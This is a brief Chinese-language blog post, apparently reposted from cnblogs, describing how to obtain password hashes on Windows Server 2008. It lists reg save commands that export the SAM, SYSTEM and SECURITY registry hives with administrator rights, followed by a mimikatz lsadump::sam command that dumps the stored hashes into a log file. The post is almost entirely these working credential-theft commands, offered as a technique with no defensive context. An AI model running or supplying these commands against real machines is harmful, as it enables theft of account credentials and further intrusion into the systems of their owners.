Windows 获取Hash手法
作者:互联网
Windows server 2008:
1、当sam文件被占用时,利用reg(注册表)导出文件三个文件(需要administrator权限)
reg save HKLM\sam C:\sam.hive
reg save HKLM\system C:\system.hive
reg save HKLM\security C:\security.hive
再把三个文件放到mimikatz同目录下执行命令,在当前目录下会生成一个log.txt
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" "exit" > log.txt
标签:Hash,HKLM,sam,Windows,system,hive,手法,save,reg 来源: https://www.cnblogs.com/PatrickStar88888888/p/15270448.html